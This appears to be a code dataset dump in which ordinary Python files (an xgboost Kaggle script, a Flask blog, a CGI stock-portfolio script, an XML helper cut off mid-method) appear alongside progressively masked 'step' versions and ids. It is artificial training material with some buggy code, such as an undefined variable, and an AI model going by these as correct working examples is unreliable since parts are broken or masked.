"step-1": "import pandas\nimport evaluation\nimport sys\n\nsys.path.append('D:\\\\libs\\\\xgboost\\\\wrapper')\nimport xgboost as xgb\n\n# Read training data\nfolder = '../data/'\ntrain = pandas.read_csv(folder + 'training.csv', index_col='id')\n\n# Define features to drop from train data\n# variables_to_drop = ['mass', 'production', 'min_ANNmuon', 'signal', 'SPDhits', 'IP', 'IPSig', ]\n# variables_to_drop = ['mass', 'production', 'min_ANNmuon', 'signal',\n# 'SPDhits', 'p0_p', 'p1_p', 'p2_p', 'p0_eta', 'p1_eta', 'p2_eta', ]\nvariables_to_drop = ['mass', 'production', 'min_ANNmuon', 'signal',\n 'SPDhits', ]\n\n\n# Train xgb model on train data\ntrain_X = train.drop(variables_to_drop, 1).values\ntrain_y = train['signal'].values\nxg_train = xgb.DMatrix(train_X, label=train_y)\n\n# params = {'silent': 1, 'nthread': 2, 'objective': 'binary:logistic', 'eval_metric': 'auc',\n# 'max_depth': 6, 'eta': 0.3}\n\nparams = {'objective': 'binary:logistic',\n 'eta': 0.3,\n 'max_depth': 5,\n 'min_child_weight': 3,\n 'silent': 1,\n 'subsample': 0.7,\n 'colsample_bytree': 0.7,\n 'seed': 1,\n 'nthread': 2}\nnum_trees = 250\n\nn_rounds = 120\nwatchlist = [(xg_train, 'train')]\n\nxgb_model = xgb.train(params, xg_train, num_trees, watchlist)\n# xgb_model = xgb.train(params, xg_train, n_rounds, watchlist)\n\n# Check agreement test\ncheck_agreement = pandas.read_csv(folder + 'check_agreement.csv', index_col='id')\nxg_check_agreement = xgb.DMatrix(check_agreement.values)\nagreement_probs = xgb_model.predict(xg_check_agreement)\n\nks = evaluation.compute_ks(\n agreement_probs[check_agreement['signal'].values == 0],\n agreement_probs[check_agreement['signal'].values == 1],\n check_agreement[check_agreement['signal'] == 0]['weight'].values,\n check_agreement[check_agreement['signal'] == 1]['weight'].values)\nprint 'KS metric', ks, ks < 0.09\n\n# Check correlation test\ncheck_correlation = pandas.read_csv(folder + 'check_correlation.csv', index_col='id')\nxg_check_correlation = xgb.DMatrix(check_correlation.values)\ncorrelation_probs = xgb_model.predict(xg_check_correlation)\ncvm = evaluation.compute_cvm(correlation_probs, check_correlation['mass'])\nprint 'CvM metric', cvm, cvm < 0.002\n\n# Compute weighted AUC on the training data with min_ANNmuon > 0.4\ntrain_eval = train[train['min_ANNmuon'] > 0.4]\ntrain_eval_X = train_eval.drop(variables_to_drop, 1).values\nxg_train_eval = xgb.DMatrix(train_eval_X)\ntrain_probs = xgb_model.predict(xg_train_eval)\nAUC = evaluation.roc_auc_truncated(train_eval['signal'], train_probs)\nprint 'AUC', AUC\n\n# Predict test, create file for kaggle\ntest = pandas.read_csv(folder + 'test.csv', index_col='id')\ntest_X = test.values\nxg_test = xgb.DMatrix(test_X)\nresult = pandas.DataFrame({'id': test.index})\n\nresult['prediction'] = xgb_model.predict(xg_test)\n\nresult.to_csv('../submissions/xgb.csv', index=False, sep=',')\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
# -*- coding:utf-8 -*-
'''
@author:oldwai
'''
# email: frankandrew@163.com
def multipliers():
return lab1(x)
def lab1(x):
list1 = []
for i in range(4):
sum = x*i
list1.append(sum)
return list1
#print ([m(2) for m in multipliers()])
def func1(x):
list2 = []
for m in multipliers():
list2.append(m(x))
return list2
print(func1(3))
|
normal
|
{
"blob_id": "807e19f09f4a46b6c39457b8916714e2c54c3e8d",
"index": 5802,
"step-1": "<mask token>\n\n\ndef lab1(x):\n list1 = []\n for i in range(4):\n sum = x * i\n list1.append(sum)\n return list1\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef lab1(x):\n list1 = []\n for i in range(4):\n sum = x * i\n list1.append(sum)\n return list1\n\n\ndef func1(x):\n list2 = []\n for m in multipliers():\n list2.append(m(x))\n return list2\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef multipliers():\n return lab1(x)\n\n\ndef lab1(x):\n list1 = []\n for i in range(4):\n sum = x * i\n list1.append(sum)\n return list1\n\n\ndef func1(x):\n list2 = []\n for m in multipliers():\n list2.append(m(x))\n return list2\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\ndef multipliers():\n return lab1(x)\n\n\ndef lab1(x):\n list1 = []\n for i in range(4):\n sum = x * i\n list1.append(sum)\n return list1\n\n\ndef func1(x):\n list2 = []\n for m in multipliers():\n list2.append(m(x))\n return list2\n\n\nprint(func1(3))\n",
"step-5": "# -*- coding:utf-8 -*-\r\n'''\r\n@author:oldwai\r\n'''\r\n# email: frankandrew@163.com\r\n\r\n\r\ndef multipliers():\r\n return lab1(x)\r\n\r\n\r\ndef lab1(x):\r\n list1 = []\r\n for i in range(4):\r\n sum = x*i\r\n list1.append(sum)\r\n return list1\r\n\r\n#print ([m(2) for m in multipliers()])\r\ndef func1(x):\r\n list2 = []\r\n for m in multipliers():\r\n list2.append(m(x))\r\n return list2\r\n\r\nprint(func1(3))",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
@app.route('/')
def hello_world():
return 'Hello Waeweorld!'
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
if not os.path.exists(dbDir):
db.create_all()
@app.route('/')
def hello_world():
return 'Hello Waeweorld!'
if __name__ == '__main__':
app.run()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
dbDir = os.path.dirname(__file__)
dbDir = '%s%sappConfig%smine.db' % (dbDir, os.sep, os.sep)
if not os.path.exists(dbDir):
db.create_all()
@app.route('/')
def hello_world():
return 'Hello Waeweorld!'
if __name__ == '__main__':
app.run()
<|reserved_special_token_1|>
from appConfig.App import app, db
import os
dbDir = os.path.dirname(__file__)
dbDir = '%s%sappConfig%smine.db' % (dbDir, os.sep, os.sep)
if not os.path.exists(dbDir):
db.create_all()
@app.route('/')
def hello_world():
return 'Hello Waeweorld!'
if __name__ == '__main__':
app.run()
<|reserved_special_token_1|>
from appConfig.App import app, db
import os
dbDir = os.path.dirname(__file__)
# staticFolder = '%sstatic' % os.sep
dbDir = '%s%sappConfig%smine.db' % (dbDir, os.sep, os.sep)
if not os.path.exists(dbDir):
# 创建数据库并创建表
db.create_all()
# app._static_folder = staticFolder
@app.route('/')
def hello_world():
return 'Hello Waeweorld!'
if __name__ == '__main__':
app.run()
|
flexible
|
{
"blob_id": "71cee06ce697030fd0cea363ddecaa411b39544d",
"index": 4330,
"step-1": "<mask token>\n\n\n@app.route('/')\ndef hello_world():\n return 'Hello Waeweorld!'\n\n\n<mask token>\n",
"step-2": "<mask token>\nif not os.path.exists(dbDir):\n db.create_all()\n\n\n@app.route('/')\ndef hello_world():\n return 'Hello Waeweorld!'\n\n\nif __name__ == '__main__':\n app.run()\n",
"step-3": "<mask token>\ndbDir = os.path.dirname(__file__)\ndbDir = '%s%sappConfig%smine.db' % (dbDir, os.sep, os.sep)\nif not os.path.exists(dbDir):\n db.create_all()\n\n\n@app.route('/')\ndef hello_world():\n return 'Hello Waeweorld!'\n\n\nif __name__ == '__main__':\n app.run()\n",
"step-4": "from appConfig.App import app, db\nimport os\ndbDir = os.path.dirname(__file__)\ndbDir = '%s%sappConfig%smine.db' % (dbDir, os.sep, os.sep)\nif not os.path.exists(dbDir):\n db.create_all()\n\n\n@app.route('/')\ndef hello_world():\n return 'Hello Waeweorld!'\n\n\nif __name__ == '__main__':\n app.run()\n",
"step-5": "from appConfig.App import app, db\nimport os\n\ndbDir = os.path.dirname(__file__)\n# staticFolder = '%sstatic' % os.sep\ndbDir = '%s%sappConfig%smine.db' % (dbDir, os.sep, os.sep)\n\nif not os.path.exists(dbDir):\n # 创建数据库并创建表\n db.create_all()\n\n\n# app._static_folder = staticFolder\n\n\n@app.route('/')\ndef hello_world():\n return 'Hello Waeweorld!'\n\n\nif __name__ == '__main__':\n app.run()\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
#!/usr/bin/python
import operator
import cgi, sys, LINK_HEADERS
import simplejson as json
from datetime import datetime
from dateutil import tz
from decimal import *
sys.path.insert(0, str(LINK_HEADERS.DAO_LINK))
from transaction_dao import Transaction_dao
from user_portfolio_dao import User_portfolio_dao
from user_stock_value_dao import User_stock_value_dao
from company_dao import Company_dao
from history_dao import History_dao
from sector_info_dao import Sector_info_dao
print "Content-Type: text/html\r\n\r\n"
form = cgi.FieldStorage()
if form.getvalue("username") != None:
username = form.getvalue("username")
if form.getvalue("filter") != None:
portfolio_filter = form.getvalue("filter")
if portfolio_filter == '1':
filter_flag = "ALL"
elif portfolio_filter == '2':
filter_flag = "ALGOS"
elif portfolio_filter == '0':
filter_flag = "USER"
else:
filter_flag = portfolio_filter
tdao = Transaction_dao()
u2 = User_stock_value_dao()
u1 = User_portfolio_dao()
cdao = Company_dao()
hdao = History_dao()
data={}
if filter_flag == "ALL":
t = hdao.select_all(username)
l = tdao.get_user_stock_list(username)
elif filter_flag == "ALGOS":
t = hdao.select_all_algo_trades(username)
l = tdao.get_all_algo_stock_list(username)
elif filter_flag == "USER":
t = hdao.select_all_user_trades(username)
l = tdao.get_only_user_stock_list(username)
else:
t = hdao.select_algo_trades(username, filter_flag)
l = tdao.get_algo_stock_list(username, filter_flag)
# HISTORY
if t:
data['transactions']={}
for i in range(len(t)):
data['transactions'][i]={}
#start date formatting
from_zone = tz.tzutc()
to_zone = tz.tzlocal()
date_time = t[i].get_trans_date()
date_time = date_time.strftime('%Y-%m-%d %H:%M:%S')
date_time = datetime.strptime(date_time, '%Y-%m-%d %H:%M:%S')
date_time = date_time.replace(tzinfo=from_zone)
updated_date_time = date_time.astimezone(to_zone)
updated_date_time = updated_date_time.strftime('%Y-%m-%d %H:%M:%S')
#end date formatting
data['transactions'][i]['trans_date'] = updated_date_time
data['transactions'][i]['trans_type'] = t[i].get_trans_type()
# try:
# data['transactions'][i]['name']=cdao.get_company_model(t[i].get_stock()).get_name()
# except:
# data['transactions'][i]['name']=""
data['transactions'][i]['stock'] = t[i].get_stock()
data['transactions'][i]['price'] = t[i].get_price()
data['transactions'][i]['total_price'] = t[i].get_total_price()
data['transactions'][i]['volume'] = t[i].get_volume()
else:
data['transactions']={}
data['transactions'][0]={}
data['transactions'][0]['trans_date'] = ""
data['transactions'][0]['trans_type'] = ""
data['transactions'][0]['name']=""
data['transactions'][0]['stock'] = ""
data['transactions'][0]['price'] = ""
data['transactions'][0]['total_price'] = ""
data['transactions'][0]['volume'] = ""
# OWNED STOCKS
sector_dao=Sector_info_dao()
data['sector_volume']={}
if l:
data['owned_stocks']={}
#total_stock_value = 0
# for i in range(len(l)):
# c = cdao.get_company_model(l[i])
c = cdao.get_list_of_company_models(l)
if c:
for i in range(len(c)):
try:
o = tdao.get_owned_stock_model(username, c[i].get_symbol(), c[i].get_ask())
except:
continue
data['owned_stocks'][i]={}
data['owned_stocks'][i]['name']=c[i].get_name()
data['owned_stocks'][i]['stock'] = c[i].get_symbol()
data['owned_stocks'][i]['current_shares'] = o.get_volume()
data['owned_stocks'][i]['current_price'] = c[i].get_ask()
data['owned_stocks'][i]['total_worth'] = o.get_total_worth()
data['owned_stocks'][i]['profit'] = o.get_profit()
#total_stock_value = Decimal(total_stock_value) + Decimal(o.get_total_worth())
#--------Code for chart - sector_volume:---
volume=o.get_volume()
symbol=c[i].get_symbol()
try:
sector=sector_dao.get_sector_by_symbol(symbol)
if(sector.strip()==''):sector="Other"
except:
sector="Other"
if(sector not in data['sector_volume']):
data['sector_volume'][sector]=volume;
else:
data['sector_volume'][sector]+=volume;
#----------end of code for chart--------
else:
data['owned_stocks']={}
data['owned_stocks'][0]={}
data['owned_stocks'][0]['name'] =""
data['owned_stocks'][0]['stock'] = ""
data['owned_stocks'][0]['current_shares'] = ""
data['owned_stocks'][0]['current_price'] = ""
data['owned_stocks'][0]['total_worth'] = ""
data['owned_stocks'][0]['profit'] = ""
# PORTFOLIO INFORMATION
#---------------------Code for Chart Generation-----------------------------
sectors=[]
volume=[]
sorted_volume=sorted(data['sector_volume'].items(),key=operator.itemgetter(1))
length=len(sorted_volume);
#Insertion Sort
for i in range(length):
j=i
while(j>0 and sorted_volume[j][1]>sorted_volume[j-1][1]):
temp=sorted_volume[j-1]
sorted_volume[j-1]=sorted_volume[j]
sorted_volume[j]=temp
j=j-1
MAX=35
for i in range(length):
if(i>=MAX):break;
if(sorted_volume[i][0]=='Other'):continue
sectors.append(sorted_volume[i][0])
volume.append(sorted_volume[i][1])
data['chart_axis']=sectors;
data['chart_data']=volume;
#--------------------------------end of code for chart--------------------#
up = u1.get_user_portfolio_model(username)
usv = u2.get_user_stock_value_model(username)
data['users']={}
if up:
data['users']['total_portfolio'] = up.get_total_portfolio()
data['users']['total_deposited'] = up.get_total_deposited()
data['users']['available_funds'] = up.get_available_funds()
else:
data['users']['total_portfolio'] = 0
data['users']['total_deposited'] = 0
data['users']['available_funds'] = 0
if usv:
data['users']['total_stock_values'] = usv.get_total_stock_values()
data['users']['profit'] = usv.get_profit()
else:
data['users']['total_stock_values'] = 0
data['users']['profit'] = 0
#----------------------------------code owned Stocks chart-----------------------------#
owned_stocks=data['owned_stocks']
owned_stocks_graph_data={}
sorted_owned_stocks_chart_axis=[]
sorted_owned_stocks_chart_value=[]
for i in owned_stocks:
owned_stocks_graph_data[owned_stocks[i]['stock']]=owned_stocks[i]['total_worth']
length=len(owned_stocks_graph_data);
sorted_data=sorted(owned_stocks_graph_data.items(),key=operator.itemgetter(1))
for i in range(length-1,-1,-1):
if(length-i>MAX):break
sorted_owned_stocks_chart_axis.append(sorted_data[i][0])
sorted_owned_stocks_chart_value.append(sorted_data[i][1])
data['owned_stocks_chart_axis']=sorted_owned_stocks_chart_axis;
data['owned_stocks_chart_value']=sorted_owned_stocks_chart_value;
json_result = json.dumps(data)
print json_result
|
normal
|
{
"blob_id": "4264cba9a6c39219d21bd21d4b21009bacd1db38",
"index": 61,
"step-1": "#!/usr/bin/python\n\nimport operator\nimport cgi, sys, LINK_HEADERS\nimport simplejson as json\nfrom datetime import datetime\nfrom dateutil import tz\nfrom decimal import *\nsys.path.insert(0, str(LINK_HEADERS.DAO_LINK))\nfrom transaction_dao import Transaction_dao\nfrom user_portfolio_dao import User_portfolio_dao\nfrom user_stock_value_dao import User_stock_value_dao\nfrom company_dao import Company_dao\nfrom history_dao import History_dao\nfrom sector_info_dao import Sector_info_dao\nprint \"Content-Type: text/html\\r\\n\\r\\n\"\n\nform = cgi.FieldStorage()\n\nif form.getvalue(\"username\") != None:\n username = form.getvalue(\"username\")\nif form.getvalue(\"filter\") != None:\n portfolio_filter = form.getvalue(\"filter\")\n\n if portfolio_filter == '1':\n filter_flag = \"ALL\"\n elif portfolio_filter == '2':\n filter_flag = \"ALGOS\"\n elif portfolio_filter == '0':\n filter_flag = \"USER\"\n else:\n filter_flag = portfolio_filter\n \ntdao = Transaction_dao()\nu2 = User_stock_value_dao()\nu1 = User_portfolio_dao()\ncdao = Company_dao()\nhdao = History_dao()\n\ndata={}\n\nif filter_flag == \"ALL\":\n t = hdao.select_all(username)\n l = tdao.get_user_stock_list(username)\nelif filter_flag == \"ALGOS\":\n t = hdao.select_all_algo_trades(username)\n l = tdao.get_all_algo_stock_list(username)\nelif filter_flag == \"USER\":\n t = hdao.select_all_user_trades(username)\n l = tdao.get_only_user_stock_list(username)\nelse:\n t = hdao.select_algo_trades(username, filter_flag)\n l = tdao.get_algo_stock_list(username, filter_flag)\n\n\n# HISTORY\nif t:\n data['transactions']={}\n \n for i in range(len(t)):\n data['transactions'][i]={}\n\t\n\t #start date formatting\n from_zone = tz.tzutc()\n to_zone = tz.tzlocal()\n date_time = t[i].get_trans_date()\n date_time = date_time.strftime('%Y-%m-%d %H:%M:%S')\n date_time = datetime.strptime(date_time, '%Y-%m-%d %H:%M:%S')\t\n date_time = date_time.replace(tzinfo=from_zone)\n updated_date_time = date_time.astimezone(to_zone)\n updated_date_time = updated_date_time.strftime('%Y-%m-%d %H:%M:%S')\n\t #end date formatting\t\n\n data['transactions'][i]['trans_date'] = updated_date_time\n data['transactions'][i]['trans_type'] = t[i].get_trans_type()\n\n# try:\n# data['transactions'][i]['name']=cdao.get_company_model(t[i].get_stock()).get_name()\n# except:\n# data['transactions'][i]['name']=\"\"\n \n data['transactions'][i]['stock'] = t[i].get_stock()\n data['transactions'][i]['price'] = t[i].get_price()\n data['transactions'][i]['total_price'] = t[i].get_total_price()\n data['transactions'][i]['volume'] = t[i].get_volume()\nelse:\n data['transactions']={}\n data['transactions'][0]={}\n data['transactions'][0]['trans_date'] = \"\"\n data['transactions'][0]['trans_type'] = \"\"\n data['transactions'][0]['name']=\"\"\n data['transactions'][0]['stock'] = \"\"\n data['transactions'][0]['price'] = \"\"\n data['transactions'][0]['total_price'] = \"\"\n data['transactions'][0]['volume'] = \"\"\n \n\n\n# OWNED STOCKS\nsector_dao=Sector_info_dao()\ndata['sector_volume']={}\nif l:\n \n data['owned_stocks']={}\n #total_stock_value = 0\n \n# for i in range(len(l)):\n# c = cdao.get_company_model(l[i])\n \n c = cdao.get_list_of_company_models(l)\n if c:\n for i in range(len(c)):\n try:\n o = tdao.get_owned_stock_model(username, c[i].get_symbol(), c[i].get_ask()) \n except:\n continue\n \n data['owned_stocks'][i]={}\n data['owned_stocks'][i]['name']=c[i].get_name()\n data['owned_stocks'][i]['stock'] = c[i].get_symbol()\n data['owned_stocks'][i]['current_shares'] = o.get_volume()\n data['owned_stocks'][i]['current_price'] = c[i].get_ask()\n data['owned_stocks'][i]['total_worth'] = o.get_total_worth()\n data['owned_stocks'][i]['profit'] = o.get_profit()\n #total_stock_value = Decimal(total_stock_value) + Decimal(o.get_total_worth())\n\n #--------Code for chart - sector_volume:---\n volume=o.get_volume()\n symbol=c[i].get_symbol()\n try:\n sector=sector_dao.get_sector_by_symbol(symbol)\n if(sector.strip()==''):sector=\"Other\"\n except:\n sector=\"Other\"\n\n if(sector not in data['sector_volume']):\n data['sector_volume'][sector]=volume;\n else:\n data['sector_volume'][sector]+=volume;\n #----------end of code for chart--------\n \nelse:\n data['owned_stocks']={}\n data['owned_stocks'][0]={}\n data['owned_stocks'][0]['name'] =\"\"\n data['owned_stocks'][0]['stock'] = \"\"\n data['owned_stocks'][0]['current_shares'] = \"\"\n data['owned_stocks'][0]['current_price'] = \"\"\n data['owned_stocks'][0]['total_worth'] = \"\"\n data['owned_stocks'][0]['profit'] = \"\"\n\n# PORTFOLIO INFORMATION\n#---------------------Code for Chart Generation-----------------------------\nsectors=[]\nvolume=[]\n\nsorted_volume=sorted(data['sector_volume'].items(),key=operator.itemgetter(1))\nlength=len(sorted_volume);\n\n#Insertion Sort\nfor i in range(length):\n j=i\n while(j>0 and sorted_volume[j][1]>sorted_volume[j-1][1]):\n temp=sorted_volume[j-1]\n sorted_volume[j-1]=sorted_volume[j]\n sorted_volume[j]=temp\n j=j-1\n\nMAX=35\nfor i in range(length):\n if(i>=MAX):break;\n if(sorted_volume[i][0]=='Other'):continue\n sectors.append(sorted_volume[i][0])\n volume.append(sorted_volume[i][1])\n\n\ndata['chart_axis']=sectors;\ndata['chart_data']=volume;\n#--------------------------------end of code for chart--------------------#\n\nup = u1.get_user_portfolio_model(username)\nusv = u2.get_user_stock_value_model(username)\ndata['users']={}\n\nif up:\n data['users']['total_portfolio'] = up.get_total_portfolio()\n data['users']['total_deposited'] = up.get_total_deposited()\n data['users']['available_funds'] = up.get_available_funds()\nelse:\n data['users']['total_portfolio'] = 0\n data['users']['total_deposited'] = 0\n data['users']['available_funds'] = 0 \n\nif usv:\n data['users']['total_stock_values'] = usv.get_total_stock_values()\n data['users']['profit'] = usv.get_profit() \nelse:\n data['users']['total_stock_values'] = 0\n data['users']['profit'] = 0\n \n\n\n\n\n#----------------------------------code owned Stocks chart-----------------------------#\n\nowned_stocks=data['owned_stocks']\nowned_stocks_graph_data={}\n\nsorted_owned_stocks_chart_axis=[]\nsorted_owned_stocks_chart_value=[]\n\nfor i in owned_stocks:\n owned_stocks_graph_data[owned_stocks[i]['stock']]=owned_stocks[i]['total_worth']\n\nlength=len(owned_stocks_graph_data);\nsorted_data=sorted(owned_stocks_graph_data.items(),key=operator.itemgetter(1))\n\n\nfor i in range(length-1,-1,-1):\n if(length-i>MAX):break\n sorted_owned_stocks_chart_axis.append(sorted_data[i][0])\n sorted_owned_stocks_chart_value.append(sorted_data[i][1])\n\ndata['owned_stocks_chart_axis']=sorted_owned_stocks_chart_axis;\ndata['owned_stocks_chart_value']=sorted_owned_stocks_chart_value;\n\njson_result = json.dumps(data)\nprint json_result\n\n \n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
<|reserved_special_token_0|>
@app.route('/guess/<name>')
def guesser(name):
person = Person(name=name)
return render_template('guess.html', name=person.name, gender=person.
gender, age=person.age, country=person.country)
<|reserved_special_token_0|>
@app.route('/post/<int:id>')
def blog_post(id):
requested_post = None
for post in post_objects:
if post.id == id:
requested_post = post
return render_template('post.html', post=requested_post)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
for post in all_posts:
post_obj = Post(post['id'], post['title'], post['subtitle'], post['body'])
post_objects.append(post_obj)
@app.route('/')
def home_page():
year = datetime.datetime.today().year
return render_template('index.html', current_year=year)
@app.route('/guess/<name>')
def guesser(name):
person = Person(name=name)
return render_template('guess.html', name=person.name, gender=person.
gender, age=person.age, country=person.country)
@app.route('/blog')
def blog():
return render_template('blog.html', posts=post_objects)
@app.route('/post/<int:id>')
def blog_post(id):
requested_post = None
for post in post_objects:
if post.id == id:
requested_post = post
return render_template('post.html', post=requested_post)
if __name__ == '__main__':
app.run(debug=True)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
app = Flask(__name__)
all_posts = all_posts = requests.get(
'https://api.npoint.io/5abcca6f4e39b4955965').json()
post_objects = []
for post in all_posts:
post_obj = Post(post['id'], post['title'], post['subtitle'], post['body'])
post_objects.append(post_obj)
@app.route('/')
def home_page():
year = datetime.datetime.today().year
return render_template('index.html', current_year=year)
@app.route('/guess/<name>')
def guesser(name):
person = Person(name=name)
return render_template('guess.html', name=person.name, gender=person.
gender, age=person.age, country=person.country)
@app.route('/blog')
def blog():
return render_template('blog.html', posts=post_objects)
@app.route('/post/<int:id>')
def blog_post(id):
requested_post = None
for post in post_objects:
if post.id == id:
requested_post = post
return render_template('post.html', post=requested_post)
if __name__ == '__main__':
app.run(debug=True)
<|reserved_special_token_1|>
from flask import Flask
from flask import render_template
import datetime
from person import Person
import requests
from post import Post
app = Flask(__name__)
all_posts = all_posts = requests.get(
'https://api.npoint.io/5abcca6f4e39b4955965').json()
post_objects = []
for post in all_posts:
post_obj = Post(post['id'], post['title'], post['subtitle'], post['body'])
post_objects.append(post_obj)
@app.route('/')
def home_page():
year = datetime.datetime.today().year
return render_template('index.html', current_year=year)
@app.route('/guess/<name>')
def guesser(name):
person = Person(name=name)
return render_template('guess.html', name=person.name, gender=person.
gender, age=person.age, country=person.country)
@app.route('/blog')
def blog():
return render_template('blog.html', posts=post_objects)
@app.route('/post/<int:id>')
def blog_post(id):
requested_post = None
for post in post_objects:
if post.id == id:
requested_post = post
return render_template('post.html', post=requested_post)
if __name__ == '__main__':
app.run(debug=True)
<|reserved_special_token_1|>
from flask import Flask
from flask import render_template
import datetime
from person import Person
import requests
from post import Post
app = Flask(__name__)
all_posts = all_posts = requests.get(
"https://api.npoint.io/5abcca6f4e39b4955965").json()
post_objects = []
for post in all_posts:
post_obj = Post(post["id"], post["title"], post["subtitle"], post["body"])
post_objects.append(post_obj)
@app.route('/')
def home_page():
year = datetime.datetime.today().year
return render_template("index.html",
current_year=year)
@app.route('/guess/<name>')
def guesser(name):
person = Person(name=name)
return render_template("guess.html",
name=person.name,
gender=person.gender,
age=person.age,
country=person.country,
)
@app.route('/blog')
def blog():
return render_template("blog.html", posts=post_objects)
@app.route('/post/<int:id>')
def blog_post(id):
requested_post = None
for post in post_objects:
if post.id == id:
requested_post = post
return render_template("post.html", post=requested_post)
if __name__ == "__main__":
app.run(debug=True)
|
flexible
|
{
"blob_id": "895ece0b8d45cd64e43f8ddc54824f7647254185",
"index": 2547,
"step-1": "<mask token>\n\n\n@app.route('/guess/<name>')\ndef guesser(name):\n person = Person(name=name)\n return render_template('guess.html', name=person.name, gender=person.\n gender, age=person.age, country=person.country)\n\n\n<mask token>\n\n\n@app.route('/post/<int:id>')\ndef blog_post(id):\n requested_post = None\n for post in post_objects:\n if post.id == id:\n requested_post = post\n return render_template('post.html', post=requested_post)\n\n\n<mask token>\n",
"step-2": "<mask token>\nfor post in all_posts:\n post_obj = Post(post['id'], post['title'], post['subtitle'], post['body'])\n post_objects.append(post_obj)\n\n\n@app.route('/')\ndef home_page():\n year = datetime.datetime.today().year\n return render_template('index.html', current_year=year)\n\n\n@app.route('/guess/<name>')\ndef guesser(name):\n person = Person(name=name)\n return render_template('guess.html', name=person.name, gender=person.\n gender, age=person.age, country=person.country)\n\n\n@app.route('/blog')\ndef blog():\n return render_template('blog.html', posts=post_objects)\n\n\n@app.route('/post/<int:id>')\ndef blog_post(id):\n requested_post = None\n for post in post_objects:\n if post.id == id:\n requested_post = post\n return render_template('post.html', post=requested_post)\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n",
"step-3": "<mask token>\napp = Flask(__name__)\nall_posts = all_posts = requests.get(\n 'https://api.npoint.io/5abcca6f4e39b4955965').json()\npost_objects = []\nfor post in all_posts:\n post_obj = Post(post['id'], post['title'], post['subtitle'], post['body'])\n post_objects.append(post_obj)\n\n\n@app.route('/')\ndef home_page():\n year = datetime.datetime.today().year\n return render_template('index.html', current_year=year)\n\n\n@app.route('/guess/<name>')\ndef guesser(name):\n person = Person(name=name)\n return render_template('guess.html', name=person.name, gender=person.\n gender, age=person.age, country=person.country)\n\n\n@app.route('/blog')\ndef blog():\n return render_template('blog.html', posts=post_objects)\n\n\n@app.route('/post/<int:id>')\ndef blog_post(id):\n requested_post = None\n for post in post_objects:\n if post.id == id:\n requested_post = post\n return render_template('post.html', post=requested_post)\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n",
"step-4": "from flask import Flask\nfrom flask import render_template\nimport datetime\nfrom person import Person\nimport requests\nfrom post import Post\napp = Flask(__name__)\nall_posts = all_posts = requests.get(\n 'https://api.npoint.io/5abcca6f4e39b4955965').json()\npost_objects = []\nfor post in all_posts:\n post_obj = Post(post['id'], post['title'], post['subtitle'], post['body'])\n post_objects.append(post_obj)\n\n\n@app.route('/')\ndef home_page():\n year = datetime.datetime.today().year\n return render_template('index.html', current_year=year)\n\n\n@app.route('/guess/<name>')\ndef guesser(name):\n person = Person(name=name)\n return render_template('guess.html', name=person.name, gender=person.\n gender, age=person.age, country=person.country)\n\n\n@app.route('/blog')\ndef blog():\n return render_template('blog.html', posts=post_objects)\n\n\n@app.route('/post/<int:id>')\ndef blog_post(id):\n requested_post = None\n for post in post_objects:\n if post.id == id:\n requested_post = post\n return render_template('post.html', post=requested_post)\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n",
"step-5": "from flask import Flask\nfrom flask import render_template\nimport datetime\nfrom person import Person\nimport requests\nfrom post import Post\n\napp = Flask(__name__)\nall_posts = all_posts = requests.get(\n \"https://api.npoint.io/5abcca6f4e39b4955965\").json()\npost_objects = []\n\nfor post in all_posts:\n post_obj = Post(post[\"id\"], post[\"title\"], post[\"subtitle\"], post[\"body\"])\n post_objects.append(post_obj)\n\n\n@app.route('/')\ndef home_page():\n year = datetime.datetime.today().year\n return render_template(\"index.html\",\n current_year=year)\n\n\n@app.route('/guess/<name>')\ndef guesser(name):\n person = Person(name=name)\n return render_template(\"guess.html\",\n name=person.name,\n gender=person.gender,\n age=person.age,\n country=person.country,\n )\n\n\n@app.route('/blog')\ndef blog():\n return render_template(\"blog.html\", posts=post_objects)\n\n\n@app.route('/post/<int:id>')\ndef blog_post(id):\n requested_post = None\n for post in post_objects:\n if post.id == id:\n requested_post = post\n return render_template(\"post.html\", post=requested_post)\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n",
"step-ids": [
2,
5,
6,
7,
8
]
}
|
[
2,
5,
6,
7,
8
] |
<|reserved_special_token_0|>
class xmlSp:
def addNode(self, parentNode, childNode):
parentNode.append(childNode)
def createChildNode(self, key, value, propertyMap={}):
element = Element(key, propertyMap)
element.text = value
return element
<|reserved_special_token_0|>
def fetchSingleNode(self, nodeTree, xpathOrKey):
if xpathOrKey == None or xpathOrKey == '':
return None
elif len(xpathOrKey.split('/')) > 1:
return nodeTree.find(xpathOrKey)
else:
nodeList = nodeTree.getiterator(xpathOrKey)
if nodeList == None or len(nodeList) <= 0:
return nodeList
else:
return nodeList[0]
def fetchSingleNodeValue(self, nodeTree, xpathOrKey):
node = self.fetchSingleNode(nodeTree, xpathOrKey)
if node == None or len(node) <= 0 or node == '':
return ''
else:
return node.text
def fetchNodeList(self, nodeTree, xpathOrKey):
if xpathOrKey == None or xpathOrKey == '':
return None
elif len(xpathOrKey.split('/')) > 1:
return nodeTree.findall(xpathOrKey)
else:
return nodeTree.getiterator(xpathOrKey)
def fetchNodeValueList(self, nodeTree, xpathOrKey, key=''):
if xpathOrKey == None or xpathOrKey == '':
return None
else:
nodeValueList = []
nodeList = self.fetchNodeList(nodeTree, xpathOrKey)
for node in nodeList:
if node.tag == xpathOrKey:
nodeValueList.append(node.text)
return nodeValueList
def format(self, sourceXmlPath, destXmlPath, charset='UTF-8'):
global _exception
_exception = None
if os.path.exists(sourceXmlPath):
try:
fileRead = open(sourceXmlPath, 'r', encoding=charset)
